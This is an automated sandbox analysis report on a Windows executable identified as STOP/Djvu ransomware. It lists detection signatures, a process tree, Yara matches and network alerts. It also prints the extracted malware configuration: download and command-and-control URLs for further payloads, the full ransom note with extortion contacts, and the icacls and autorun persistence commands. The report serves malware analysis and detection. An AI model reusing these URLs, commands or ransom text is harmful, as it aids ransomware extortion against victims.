Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
C0XWmZAnYk.exe

Overview

General Information

Sample name:C0XWmZAnYk.exe
renamed because original name is a hash value
Original sample name:8f81e96f8c96dec003b51826bbd5885f.exe
Analysis ID:1492473
MD5:8f81e96f8c96dec003b51826bbd5885f
SHA1:7b8c4ec9a3808eaa32ab07d1608ad275f34adbe3
SHA256:f7561de520f21434830d40d74904e93125b76407d477411622bbd829283ba8c4
Tags:exeStop
Infos:

Detection

Babuk, Djvu
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (overwrites its own PE header)
Found malware configuration
Found ransom note / readme
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Babuk Ransomware
Yara detected Djvu Ransomware
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Infects executable files (exe, dll, sys, html)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Modifies existing user documents (likely ransomware behavior)
Tries to harvest and steal browser information (history, passwords, etc)
Writes a notice file (html or txt) to demand a ransom
Writes many files with high entropy
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found evasive API chain (may stop execution after checking a module file name)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • C0XWmZAnYk.exe (PID: 1400 cmdline: "C:\Users\user\Desktop\C0XWmZAnYk.exe" MD5: 8F81E96F8C96DEC003B51826BBD5885F)
    • C0XWmZAnYk.exe (PID: 3208 cmdline: "C:\Users\user\Desktop\C0XWmZAnYk.exe" MD5: 8F81E96F8C96DEC003B51826BBD5885F)
      • icacls.exe (PID: 4296 cmdline: icacls "C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808" /deny *S-1-1-0:(OI)(CI)(DE,DC) MD5: 2E49585E4E08565F52090B144062F97E)
      • C0XWmZAnYk.exe (PID: 6512 cmdline: "C:\Users\user\Desktop\C0XWmZAnYk.exe" --Admin IsNotAutoStart IsNotTask MD5: 8F81E96F8C96DEC003B51826BBD5885F)
        • C0XWmZAnYk.exe (PID: 2684 cmdline: "C:\Users\user\Desktop\C0XWmZAnYk.exe" --Admin IsNotAutoStart IsNotTask MD5: 8F81E96F8C96DEC003B51826BBD5885F)
  • C0XWmZAnYk.exe (PID: 7084 cmdline: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exe --Task MD5: 8F81E96F8C96DEC003B51826BBD5885F)
    • C0XWmZAnYk.exe (PID: 6776 cmdline: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exe --Task MD5: 8F81E96F8C96DEC003B51826BBD5885F)
  • C0XWmZAnYk.exe (PID: 4536 cmdline: "C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exe" --AutoStart MD5: 8F81E96F8C96DEC003B51826BBD5885F)
    • C0XWmZAnYk.exe (PID: 6360 cmdline: "C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exe" --AutoStart MD5: 8F81E96F8C96DEC003B51826BBD5885F)
  • C0XWmZAnYk.exe (PID: 6984 cmdline: "C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exe" --AutoStart MD5: 8F81E96F8C96DEC003B51826BBD5885F)
    • C0XWmZAnYk.exe (PID: 5260 cmdline: "C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exe" --AutoStart MD5: 8F81E96F8C96DEC003B51826BBD5885F)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
BabukBabuk Ransomware is a sophisticated ransomware compiled for several platforms. Windows and ARM for Linux are the most used compiled versions, but ESX and a 32bit old PE executable were observed over time. as well It uses an Elliptic Curve Algorithm (Montgomery Algorithm) to build the encryption keys.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.babuk
NameDescriptionAttributionBlogpost URLsLink
STOP, DjvuSTOP Djvu Ransomware it is a ransomware which encrypts user data through AES-256 and adds one of the dozen available extensions as marker to the encrypted file's name. It is not used to encrypt the entire file but only the first 5 MB. In its original version it was able to run offline and, in that case, it used a hard-coded key which could be extracted to decrypt files.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stop
{"Download URLs": ["http://znpst.top/dl/build2.exe", "http://securebiz.org/files/1/build3.exe"], "C2 url": "http://securebiz.org/fhsgtsspen6/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-2zbBkO06mv\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nmanager@mailtemp.ch\r\n\r\nReserve e-mail address to contact us:\r\nsupporthelp@airmail.cc\r\n\r\nYour personal ID:\r\n0335gSd743d", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\\Windows\\", "F:\\PerfLogs\\", "F:\\ProgramData\\Desktop\\", "F:\\ProgramData\\Microsoft\\", "F:\\Users\\Public\\", "F:\\$Recycle.Bin\\", "F:\\$WINDOWS.~BT\\", "F:\\dell\\", "F:\\Intel\\"], "Public Key": "-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5hXhYSvuV7\\/tFRSRYHj3\\\\nVjVVhXSpzF1y8hTVzeQKl7gRlBuYFL3Wbpu\\/WDXwMUD+J9k3Cgt2e1TxBjYxF3Sz\\\\n\\/o1QsUT1aBR4wLQ1r0q8mb6gAuV+vYXcwe600\\/QcT59zGbnEPwTJaTNu2lH6VIPS\\\\n5chI\\/uGFtgb1CbNeMmPXLeBS7GBFX\\/3EmOqEC2lL+eQlTB6xD+YqJ3+4h6MCRRHh\\\\nzE6rMA9WWMswg1C7C8z20g0KZnqrCdOBvVxY24WyNS7JFfaLxE4LF0xPC07Qpqlz\\\\ng0p4dsoX2cr7NlOI7KCoodzmjCQp68xaYfb7+bf+9bbYgPpLfqPZTtHstHNYoqer\\\\nvQIDAQAB\\\\n-----END PUBLIC KEY-----"}
SourceRuleDescriptionAuthorStrings
00000005.00000002.2099680252.0000000000B79000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
  • 0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.2046446224.0000000000A53000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
  • 0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
    00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Ransomware_Stop_1e8d48ffunknownunknown
    • 0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
    • 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
    00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_STOPDetects STOP ransomwareditekSHen
    • 0xffe88:$x1: C:\SystemID\PersonalID.txt
    • 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC)
    • 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\
    • 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\
    • 0x1002ec:$s1: " --AutoStart
    • 0x100300:$s1: " --AutoStart
    • 0x103f48:$s2: --ForNetRes
    • 0x103f10:$s3: --Admin
    • 0x104390:$s4: %username%
    • 0x1044b4:$s5: ?pid=
    • 0x1044c0:$s6: &first=true
    • 0x1044d8:$s6: &first=false
    • 0x1003f4:$s7: delself.bat
    • 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
    • 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
    • 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
    Click to see the 48 entries
    SourceRuleDescriptionAuthorStrings
    2.2.C0XWmZAnYk.exe.400000.0.unpackJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
      2.2.C0XWmZAnYk.exe.400000.0.unpackWindows_Ransomware_Stop_1e8d48ffunknownunknown
      • 0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
      • 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
      2.2.C0XWmZAnYk.exe.400000.0.unpackMALWARE_Win_STOPDetects STOP ransomwareditekSHen
      • 0xfe888:$x1: C:\SystemID\PersonalID.txt
      • 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC)
      • 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\
      • 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\
      • 0xfecec:$s1: " --AutoStart
      • 0xfed00:$s1: " --AutoStart
      • 0x102948:$s2: --ForNetRes
      • 0x102910:$s3: --Admin
      • 0x102d90:$s4: %username%
      • 0x102eb4:$s5: ?pid=
      • 0x102ec0:$s6: &first=true
      • 0x102ed8:$s6: &first=false
      • 0xfedf4:$s7: delself.bat
      • 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
      • 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
      • 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
      9.2.C0XWmZAnYk.exe.400000.0.unpackJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
        9.2.C0XWmZAnYk.exe.400000.0.unpackWindows_Ransomware_Stop_1e8d48ffunknownunknown
        • 0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
        • 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
        Click to see the 55 entries

        System Summary

        barindex
        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exe" --AutoStart, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\C0XWmZAnYk.exe, ProcessId: 3208, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper
        Timestamp:2024-08-13T21:59:12.799312+0200
        SID:2803274
        Severity:2
        Source Port:49708
        Destination Port:443
        Protocol:TCP
        Classtype:Potentially Bad Traffic
        Timestamp:2024-08-13T21:59:23.657615+0200
        SID:2036333
        Severity:1
        Source Port:49706
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-13T21:59:20.201150+0200
        SID:2803274
        Severity:2
        Source Port:49716
        Destination Port:443
        Protocol:TCP
        Classtype:Potentially Bad Traffic
        Timestamp:2024-08-13T21:59:03.829377+0200
        SID:2803274
        Severity:2
        Source Port:49707
        Destination Port:443
        Protocol:TCP
        Classtype:Potentially Bad Traffic
        Timestamp:2024-08-13T21:58:58.669114+0200
        SID:2803274
        Severity:2
        Source Port:49704
        Destination Port:443
        Protocol:TCP
        Classtype:Potentially Bad Traffic
        Timestamp:2024-08-13T21:59:01.854249+0200
        SID:2803274
        Severity:2
        Source Port:49705
        Destination Port:443
        Protocol:TCP
        Classtype:Potentially Bad Traffic

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: C0XWmZAnYk.exeAvira: detected
        Source: http://znpst.top/dl/build2.exe:Avira URL Cloud: Label: malware
        Source: http://znpst.top/dl/build2.exeAvira URL Cloud: Label: phishing
        Source: http://znpst.top/dl/build2.exe$runAvira URL Cloud: Label: malware
        Source: 00000000.00000002.2051236727.0000000000C30000.00000040.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Djvu {"Download URLs": ["http://znpst.top/dl/build2.exe", "http://securebiz.org/files/1/build3.exe"], "C2 url": "http://securebiz.org/fhsgtsspen6/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-2zbBkO06mv\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nmanager@mailtemp.ch\r\n\r\nReserve e-mail address to contact us:\r\nsupporthelp@airmail.cc\r\n\r\nYour personal ID:\r\n0335gSd743d", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeReversingLabs: Detection: 86%
        Source: C0XWmZAnYk.exeReversingLabs: Detection: 86%
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
        Source: C0XWmZAnYk.exeJoe Sandbox ML: detected
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 2_2_0040E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,2_2_0040E870
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 2_2_0040EA51 CryptDestroyHash,CryptReleaseContext,2_2_0040EA51
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 2_2_0040EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,2_2_0040EAA0
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 2_2_0040EC68 CryptDestroyHash,CryptReleaseContext,2_2_0040EC68
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 2_2_00410FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext,2_2_00410FC0
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 2_2_00411178 CryptDestroyHash,CryptReleaseContext,2_2_00411178
        Source: C0XWmZAnYk.exe, 00000006.00000003.2569068380.0000000003135000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5hXhYSvuV7\/tFRSRYHj3\\nVjVVhXSpzF1y8hTVzeQKl7gRlBuYFL3Wbpu\/WDXwMUD+J9k3Cgt2e1TxBjYxF3Sz\\n\/o1QsUT1aBR4wLQ1r0q8mb6gAuV+vYXcwe600\/QcT59zGbnEPwTJaTNu2lH6VIPS\\n5chI\/uGFtgb1CbNeMmPXLeBS7GBFX\/3EmOqEC2lL+eQlTB6xD+YqJ3+4h6MCRRHh\\nzE6rMA9WWMswg1C7C8z20g0KZnqrCdOBvVxY24WyNS7JFfaLxE4LF0xPC07Qpqlz\\ng0p4dsoX2cr7NlOI7KCoodzmjCQp68xaYfb7+bf+9bbYgPpLfqPZTtHstHNYoqer\\nvQIDAQAB\\n-----END PUBLIC KEY-----memstr_ff743e7a-5

        Compliance

        barindex
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeUnpacked PE file: 2.2.C0XWmZAnYk.exe.400000.0.unpack
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeUnpacked PE file: 6.2.C0XWmZAnYk.exe.400000.0.unpack
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeUnpacked PE file: 7.2.C0XWmZAnYk.exe.400000.0.unpack
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeUnpacked PE file: 9.2.C0XWmZAnYk.exe.400000.0.unpack
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeUnpacked PE file: 12.2.C0XWmZAnYk.exe.400000.0.unpack
        Source: C0XWmZAnYk.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\_readme.txtJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\$WinREAgent\_readme.txtJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\$WinREAgent\Scratch\_readme.txtJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\_readme.txtJump to behavior
        Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49704 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49705 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49707 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49708 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49716 version: TLS 1.2
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\40\ source: C0XWmZAnYk.exe, 00000006.00000003.2380241089.0000000003178000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2379563679.0000000003178000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2357107543.0000000003178000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2357189135.000000000317E000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: WINLOA~1.PDBwinload_prod.pdbansferApiGroup1cbec1a0a32156f64ec8d93ea2b3bdd source: C0XWmZAnYk.exe, 00000006.00000003.2515987538.0000000003117000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2516084073.000000000311B000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error\-G\Gt source: C0XWmZAnYk.exe, 00000006.00000003.2516298288.0000000003355000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: C0XWmZAnYk.exe, 00000006.00000003.2357107543.0000000003113000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\ source: C0XWmZAnYk.exe, 00000006.00000003.2674658617.0000000003497000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: C0XWmZAnYk.exe, 00000006.00000003.2515987538.0000000003132000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2393316611.000000000314B000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2393292141.000000000313D000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.errorogFile_October_4_2023__16_5_0.txt| source: C0XWmZAnYk.exe, 00000006.00000003.2516389962.0000000003344000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2515342248.0000000003331000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\Xd|I source: C0XWmZAnYk.exe, 00000006.00000003.2380241089.0000000003178000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2379563679.0000000003178000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2357107543.0000000003178000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2357189135.000000000317E000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: C0XWmZAnYk.exe, 00000006.00000003.2654737179.00000000036F9000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2654288784.00000000036F2000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2653815384.00000000036F1000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2650356078.00000000036F1000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2659028541.00000000036E9000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\* source: C0XWmZAnYk.exe, 00000006.00000003.2665181944.0000000003116000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\ome\ source: C0XWmZAnYk.exe, 00000006.00000003.2355657291.0000000003100000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: C0XWmZAnYk.exe, 00000006.00000003.2654737179.00000000036F9000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2654288784.00000000036F2000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2653815384.00000000036F1000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2650356078.00000000036F1000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2659028541.00000000036E9000.00000004.00000020.00020000.00000000.sdmp
